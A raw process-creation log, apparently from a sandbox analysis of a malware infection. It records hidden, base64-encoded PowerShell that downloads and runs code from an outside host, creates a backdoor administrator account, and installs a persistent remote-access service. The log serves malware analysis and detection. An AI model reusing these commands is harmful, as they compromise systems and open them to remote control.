Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoLogo -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAFQAUwB0AFIASQBOAGcAKAAoAEkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5AGoAYgAyAE4AdgBiAFcAVgAwAGEARwA5AGsAWgBTADUAawBaAFMAOQBQAFMAMAA1AG0AIgApACkAKQApAC4AQwBPAG4AVABFAG4AdAApACkA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\40v0i4f3\40v0i4f3.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD097.tmp" "c:\Users\user\AppData\Local\Temp\40v0i4f3\CSCD6446BB959A24110B54C9D2694B6A8A7.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\JD-Meta-Ads-Manager.pdf.docx" /o ""
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBjAG8AYwBvAG0AZQB0AGgAbwBkAGUALgBkAGUALwBmAGkAbABlADIALwA0ADQAMgBkADYAZAAyAGIAYgBiAGYAOQA1AGEAMABjADIAZAA5ADgAMwAzADUAYwA3AGMAZgAxADIAZAA5AGQANABhADIAMQA2ADMAYgBmAGQAMwAzAGYANAAyADUANAA3AGQAOABlADIAMQA3ADYAMwA0ADkAZgBjADUAYgBlAGMAOQA5ADkAZABmADcANwBlAGQANgBmAGMAMQAwAGMAZAAyAGIAOABmADEAYgBmADYAZQAxADQAMQA5AGEAZgBkADEAYgA4AGUANgA1ADIAZAA2ADAAOAAyADAAYQA1ADYAZgA1AGQAOAA3ADIAYgA5ADgAMwAyAGQANQA4AGMAZgBlADYANQAzADQAOABiAGQAYgA2ADEANgBkAGIAMgAzAGUANAAzAGYANwA5ADcAMgBkAGEAZgAzADkAMQBmADEAMwBiAGQANgBhADYAOQBjADgAOQAxADkAMAAyADgAMAA3AGEAYQBkADQAMgAzADYAMgA3ADgAMQAxAGMAOABlADAAZAA0AGEAYQA3AGUAZQA5ADMAOQBkADcANAA1ADIAMAAxAGUAZQBkADgAMAA2AGUAZQA5ADcAOQBmAGEAIgA7AA0ACgAkAGMAbwB1AG4AdAAgAD0AIAAxADAAMAA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGUAbgBkACAAewANAAoAIAAgACAAIABwAGEAcgBhAG0AKAAgAFsAUABTAE8AYgBqAGUAYwB0AF0AIAAkAGwAbwBnAE0AcwBnACAAKQANAAoADQAKACAAIAAgACAAIwAgAEMAbwBuAHYAZQByAHQAIABiAG8AZAB5ACAAdABvACAAcwB0AHIAaQBuAGcADQAKACAAIAAgACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ACAAPQAgAFsAcwB0AHIAaQBuAGcAXQAoACQAbABvAGcATQBzAGcAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgAD0AIABAACgAKQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAJABzAHQAcgBpAG4AZwBCAG8AZAB5ADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAArAD0AIAAiAC0ALQAtAC0ALQAtAC0ALQAtAC0AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAIAA9ACAAQAB7AH0AOwANAAoAIAAgACAAIAAkAGsAZQB5ACAAPQAgACIAQwBvAG4AdABlAG4AdAAtAFQAeQBwAGUAIgA7AA0ACgAgACAAIAAgACQAdgBhAGwAdQBlACAAPQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiADsADQAKAA0ACgAgACAAIAAgACQAaABlAGEAZABlAHIAcwBbACQAawBlAHkAXQAgAD0AIAAkAHYAYQBsAHUAZQA7AA0ACgAgACAAIAAgACQAdQByAGkAIAA9ACAAIgBMAE8ARwBVAFIATAAiADsADQAKACAAIAAgACAAdAByAHkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGIAbwBkAHkAIAA9ACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAB8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBNAGUAdABoAG8AZAAgAFAAbwBzAHQAIAAtAEgAZQBhAGQAZQByAHMAIAAkAGgAZQBhAGQAZQByAHMAIAAtAEIAbwBkAHkAIAAkAGIAbwBkAHkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAANAAoAfQANAAoADQAKAHcAaABpAGwAZQAoACQAYwBvAHUAbgB0ACAALQBnAHQAIAAwACkADQAKAHsADQAKAAkADQAKAAkAdAByAHkAewANAAoAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAIAAiAGIAZQBnAGkAbgAgAGQAbwB3AG4AbABvAGEAZAAgACQAdQByAGkAIgA7AA0ACgAJAAkAJABjAG8AbgB0AGUAbgB0ACAAPQAgAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBpACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AA0ACgAgACAAIAAgACAAIAAgACAAJABiAHkAdABlAEEAcgByAGEAeQAgAD0AIAAkAGMAbwBuAHQAZQBuAHQALgBjAG8AbgB0AGUAbgB0ADsADQAKACAAIAAgACAAIAAgACAAIABmAG8AcgAgACgAJABpACAAPQAgADAAOwAgAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown	Process created: C:\Windows\Temp\svczHost.exe C:\Windows\Temp\svczHost.exe cakoi10 cocomethode.de
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: unknown	Process created: C:\Windows\Temp\myRdpService.exe C:\Windows\Temp\myRdpService.exe cakoi10
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEAS